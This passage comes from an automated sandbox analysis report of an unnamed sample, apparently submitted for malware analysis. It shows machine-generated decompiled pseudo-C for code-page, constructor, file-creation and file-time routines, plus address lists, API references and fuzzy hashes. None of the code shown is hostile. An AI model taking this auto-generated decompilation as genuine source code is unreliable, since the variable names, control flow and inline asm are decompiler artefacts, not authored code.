								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x19e820; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E0018AEDD(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x19e82c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E0018AF8E(_t98);
				}
				L39:
				return E0017EC4A(_v8 ^ _t99);
			}

0x0018b358
0x0018b35f
0x0018b367
0x0018b36f
0x0018b374
0x0018b385
0x0018b385
0x0018b387
0x0018b389
0x0018b38b
0x0018b38e
0x0018b38e
0x0018b394
0x00000000
0x00000000
0x0018b39a
0x0018b39b
0x0018b39e
0x0018b3a1
0x0018b3a6
0x00000000
0x0018b3a8
0x0018b3a8
0x0018b3ae
0x0018b47c
0x0018b3b4
0x0018b3b4
0x0018b3ba
0x00000000
0x0018b3c0
0x0018b3c4
0x0018b3ca
0x0018b3cc
0x00000000
0x0018b3d2
0x0018b3d7
0x0018b3dd
0x0018b3df
0x0018b469
0x0018b46f
0x00000000
0x0018b471
0x0018b472
0x00000000
0x0018b472
0x0018b3e5
0x0018b3ef
0x0018b3f4
0x0018b3fc
0x0018b402
0x0018b403
0x0018b406
0x0018b459
0x0018b408
0x0018b408
0x0018b40c
0x0018b40f
0x0018b411
0x0018b411
0x0018b414
0x0018b416
0x00000000
0x00000000
0x0018b418
0x0018b41b
0x0018b426
0x0018b426
0x0018b428
0x00000000
0x00000000
0x0018b420
0x0018b425
0x0018b425
0x0018b425
0x0018b42a
0x0018b42d
0x0018b430
0x00000000
0x00000000
0x00000000
0x0018b430
0x0018b411
0x0018b432
0x0018b432
0x0018b435
0x0018b43a
0x0018b43a
0x0018b43d
0x0018b43e
0x0018b43e
0x0018b43e
0x0018b44e
0x0018b454
0x0018b454
0x0018b45e
0x0018b461
0x0018b462
0x0018b463
0x0018b527
0x0018b528
0x0018b52d
0x0018b52e
0x0018b52e
0x0018b3df
0x0018b3cc
0x0018b3ba
0x0018b3ae
0x00000000
0x0018b530
0x0018b48e
0x0018b496
0x0018b496
0x0018b49a
0x0018b49d
0x0018b4a3
0x0018b4a6
0x0018b4a6
0x0018b4a9
0x0018b4ab
0x0018b4ad
0x0018b4ad
0x0018b4b0
0x0018b4b2
0x00000000
0x00000000
0x0018b4b4
0x0018b4b7
0x0018b4d3
0x0018b4d3
0x0018b4d5
0x00000000
0x00000000
0x0018b4bc
0x0018b4c2
0x0018b4c4
0x0018b4ca
0x0018b4ce
0x0018b4ce
0x0018b4cf
0x00000000
0x0018b4cf
0x00000000
0x0018b4c2
0x0018b4d7
0x0018b4da
0x0018b4dd
0x00000000
0x00000000
0x00000000
0x0018b4dd
0x0018b4df
0x0018b4df
0x0018b4e2
0x0018b4e3
0x0018b4e6
0x0018b4e9
0x0018b4e9
0x0018b4ef
0x0018b4f2
0x0018b501
0x0018b50a
0x0018b50f
0x0018b515
0x0018b516
0x0018b516
0x0018b519
0x0018b51c
0x0018b51f
0x0018b522
0x0018b522
0x0018b522
0x00000000
0x0018b376
0x0018b377
0x0018b37d
0x0018b531
0x0018b540

APIs

Part of subcall function 0018AF1B: GetOEMCP.KERNEL32(00000000,?,?,0018B1A5,?), ref: 0018AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0018B1EA,?,00000000), ref: 0018B3C4
GetCPInfo.KERNEL32(00000000,0018B1EA,?,?,?,0018B1EA,?,00000000), ref: 0018B3D7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 2239bf59be3bb4fa897f3034213b398e7a39126cce407d033bbbc739f61e8ca6
Instruction ID: 6338a512cf8b228746cc7406f8c11fd9312e91d5046b18e8f66b3ccb961e59ef
Opcode Fuzzy Hash: 2239bf59be3bb4fa897f3034213b398e7a39126cce407d033bbbc739f61e8ca6
Instruction Fuzzy Hash: 89513170A082059FEB24AF75C8C26BABBE5EF55310F18846ED0978B253D7359B46CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00161385, Relevance: 3.1, APIs: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00161385(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0017E28C(_t56, _t91);
				_push(_t78);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00169619(_t78);
				 *_t89 = 0x1935b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00166057(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0016C827(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0016151F();
				_t62 = E0016151F();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0017E24A(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0016B07D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0017F350(_t87, _t89 + 0x2208, 0, 0x40);
				E0017F350(_t87, _t89 + 0x2248, 0, 0x34);
				E0017F350(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00161385
0x00161385
0x00161385
0x00161385
0x00161385
0x0016138a
0x0016138b
0x0016138e
0x00161390
0x00161393
0x0016139a
0x001613a6
0x001613a9
0x001613b4
0x001613b8
0x001613c3
0x001613c9
0x001613cf
0x001613da
0x001613e2
0x001613e6
0x001613e9
0x001613ef
0x001613f5
0x001613f7
0x0016141c
0x001613f9
0x001613fe
0x00161404
0x00161407
0x0016140d
0x00161418
0x0016140f
0x00161411
0x00161411
0x0016140d
0x0016141f
0x0016142b
0x00161432
0x00161439
0x00161442
0x0016144d
0x00161457
0x0016145d
0x00161463
0x00161469
0x0016146f
0x00161475
0x0016147b
0x00161482
0x00161488
0x0016148e
0x00161494
0x0016149a
0x001614a0
0x001614af
0x001614be
0x001614c9
0x001614d1
0x001614d7
0x001614dd
0x001614e3
0x001614e9
0x001614ef
0x001614f5
0x001614fe
0x00161504
0x0016150a
0x00161512
0x0016151c

APIs

__EH_prolog.LIBCMT ref: 00161385

Part of subcall function 00166057: __EH_prolog.LIBCMT ref: 0016605C

Part of subcall function 0016C827: __EH_prolog.LIBCMT ref: 0016C82C
Part of subcall function 0016C827: new.LIBCMT ref: 0016C86F
Part of subcall function 0016C827: new.LIBCMT ref: 0016C893

new.LIBCMT ref: 001613FE

Part of subcall function 0016B07D: __EH_prolog.LIBCMT ref: 0016B082

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c64e7c76975c2874889484657b753f8079c7b00084e7899d949e4a77067c69d8
Instruction ID: d6b98846e9562ef90b0597c343849cdcf639c06cadaccf26fe2ed78a45850cf8
Opcode Fuzzy Hash: c64e7c76975c2874889484657b753f8079c7b00084e7899d949e4a77067c69d8
Instruction Fuzzy Hash: 004116B0905B409EE724DF7988859E7FBE5FB28300F544A6ED5EE83282DB326564CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00161380, Relevance: 3.1, APIs: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00161380(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0017E28C(E00191CA7, _t91);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00169619(_t78);
				 *_t89 = 0x1935b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00166057(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0016C827(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0016151F();
				_t62 = E0016151F();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0017E24A(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0016B07D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0017F350(_t87, _t89 + 0x2208, 0, 0x40);
				E0017F350(_t87, _t89 + 0x2248, 0, 0x34);
				E0017F350(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00161380
0x00161380
0x00161380
0x00161380
0x00161385
0x0016138e
0x00161390
0x00161393
0x0016139a
0x001613a6
0x001613a9
0x001613b4
0x001613b8
0x001613c3
0x001613c9
0x001613cf
0x001613da
0x001613e2
0x001613e6
0x001613e9
0x001613ef
0x001613f5
0x001613f7
0x0016141c
0x001613f9
0x001613fe
0x00161404
0x00161407
0x0016140d
0x00161418
0x0016140f
0x00161411
0x00161411
0x0016140d
0x0016141f
0x0016142b
0x00161432
0x00161439
0x00161442
0x0016144d
0x00161457
0x0016145d
0x00161463
0x00161469
0x0016146f
0x00161475
0x0016147b
0x00161482
0x00161488
0x0016148e
0x00161494
0x0016149a
0x001614a0
0x001614af
0x001614be
0x001614c9
0x001614d1
0x001614d7
0x001614dd
0x001614e3
0x001614e9
0x001614ef
0x001614f5
0x001614fe
0x00161504
0x0016150a
0x00161512
0x0016151c

APIs

__EH_prolog.LIBCMT ref: 00161385

Part of subcall function 00166057: __EH_prolog.LIBCMT ref: 0016605C

Part of subcall function 0016C827: __EH_prolog.LIBCMT ref: 0016C82C
Part of subcall function 0016C827: new.LIBCMT ref: 0016C86F
Part of subcall function 0016C827: new.LIBCMT ref: 0016C893

new.LIBCMT ref: 001613FE

Part of subcall function 0016B07D: __EH_prolog.LIBCMT ref: 0016B082

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8e7df37e4d845c41fdc68c3aad3a8eaef3b36ea6e1487172d3d32a8c7478814b
Instruction ID: 46e5a540dff1870c94b043b9ea61f0b2b2118fb0207d934d067d81ed4311548e
Opcode Fuzzy Hash: 8e7df37e4d845c41fdc68c3aad3a8eaef3b36ea6e1487172d3d32a8c7478814b
Instruction Fuzzy Hash: 314106B0905B409EE724DF7988859E7FBE5FF29300F544A6ED1EE83282DB326564CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0018B188, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0018B188(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00188FA5(__ebx, __ecx, __edx);
				E0018B2AE(__ebx, __ecx, __edx, _t81);
				_t31 = E0018AF1B(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00188518(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E0018B350(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E001882CF();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x19eb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x19eb20) {
								E001884DE( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x19eda0 & 0x00000001;
							if(( *0x19eda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E0018ADF1(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x19ed40; // 0x3241000
									 *0x19e814 = _t44;
								}
							}
						}
						L6:
						E001884DE(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E0018895A())) = 0x16;
						goto L5;
					}
				}
			}

0x0018b188
0x0018b195
0x0018b198
0x0018b1a0
0x0018b1a9
0x0018b1ac
0x0018b1b2
0x00000000
0x0018b1b4
0x0018b1b8
0x0018b1c5
0x0018b1c7
0x0018b1cb
0x0018b1cd
0x0018b1fd
0x0018b1fd
0x00000000
0x0018b1cf
0x0018b1dc
0x0018b1e2
0x0018b1e5
0x0018b1ea
0x0018b1ee
0x0018b1f0
0x0018b20f
0x0018b213
0x0018b215
0x0018b215
0x0018b220
0x0018b224
0x0018b225
0x0018b227
0x0018b22a
0x0018b231
0x0018b236
0x0018b23b
0x0018b231
0x0018b23c
0x0018b242
0x0018b247
0x0018b249
0x0018b24c
0x0018b24f
0x0018b256
0x0018b258
0x0018b25f
0x0018b264
0x0018b26d
0x0018b272
0x0018b278
0x0018b27a
0x0018b27f
0x0018b27f
0x0018b278
0x0018b25f
0x0018b1ff
0x0018b200
0x00000000
0x0018b1f2
0x0018b1f7
0x00000000
0x0018b1f7
0x0018b1f0

APIs

Part of subcall function 00188FA5: GetLastError.KERNEL32(?,001A0EE8,00183E14,001A0EE8,?,?,00183713,00000050,?,001A0EE8,00000200), ref: 00188FA9
Part of subcall function 00188FA5: _free.LIBCMT ref: 00188FDC
Part of subcall function 00188FA5: SetLastError.KERNEL32(00000000,?,001A0EE8,00000200), ref: 0018901D
Part of subcall function 00188FA5: _abort.LIBCMT ref: 00189023

Part of subcall function 0018B2AE: _abort.LIBCMT ref: 0018B2E0
Part of subcall function 0018B2AE: _free.LIBCMT ref: 0018B314

Part of subcall function 0018AF1B: GetOEMCP.KERNEL32(00000000,?,?,0018B1A5,?), ref: 0018AF46

_free.LIBCMT ref: 0018B200
_free.LIBCMT ref: 0018B236

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: a69b7c15018830e489c604957dbd8be0526d61fd8ce98d2d14999c89d6c73981
Instruction ID: 259cd18b4514819ae20e8e12813605da44c3bba974c33390057d16d814f0bf8c
Opcode Fuzzy Hash: a69b7c15018830e489c604957dbd8be0526d61fd8ce98d2d14999c89d6c73981
Instruction Fuzzy Hash: EB31D631908204AFDB10FFA9D885BADB7E6EF55320F654099F4149B2A1EB71AF41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0016971E, Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0016971E(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E0017E360();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x22)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x1c) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E0016BC69(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E0016B66C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x18)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E0016FE56(_t59 + 0x24, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}

0x00169723
0x00169729
0x00169736
0x00169738
0x0016973e
0x0016974c
0x0016974c
0x00169746
0x00169746
0x00169746
0x00169756
0x0016976b
0x00169774
0x0016977a
0x00169784
0x00000000
0x00169786
0x00169786
0x0016978a
0x0016978c
0x0016978c
0x00169792
0x00169792
0x00169792
0x00169796
0x00169796
0x001697a6
0x001697ac
0x001697ac
0x001697b3
0x001697e1
0x001697e1
0x001697f3
0x001697f8
0x001697fb
0x00169814

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00169EDC,?,?,00167867), ref: 001697A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00169EDC,?,?,00167867), ref: 001697DB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5e8546e7e534af7f5a251159de4255b6ca9ac66f9b87891d14811d9155df0b5e
Instruction ID: b8d5005aaa190e9c3c1e8b5904c1c997fa6c62ec7b9eaad66fac6bd950d581a5
Opcode Fuzzy Hash: 5e8546e7e534af7f5a251159de4255b6ca9ac66f9b87891d14811d9155df0b5e
Instruction Fuzzy Hash: B62123B0004748AFE7308F24CC85BA7B7ECEB49764F00492DF5E582191C374AC999F21

Uniqueness

Uniqueness Score: -1.00%

Function 00169D62, Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00169D62(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x1c) != 0x100 && ( *(__ecx + 0x1c) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00170BDD(_t51, _t57,  &_v24);
				}
				if(_v26 != 0) {
					E00170BDD(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00170BDD(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}

0x00169d62
0x00169d68
0x00169d71
0x00169d7c
0x00169d7c
0x00169d82
0x00169d88
0x00169d8b
0x00169d98
0x00169d94
0x00169d94
0x00169d94
0x00169d9a
0x00169d9b
0x00169d9f
0x00169da5
0x00169db2
0x00169db2
0x00169da7
0x00169dac
0x00169db0
0x00000000
0x00000000
0x00169db0
0x00169db7
0x00169dbd
0x00169dc7
0x00169dc7
0x00169dcb
0x00169dd2
0x00169dd2
0x00169ddc
0x00169de5
0x00169de5
0x00169ded
0x00169df6
0x00169df6
0x00169e06
0x00169e14
0x00169e24
0x00169e2c
0x00169e38

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00167547,?,?,?,?), ref: 00169D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00169E2C

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

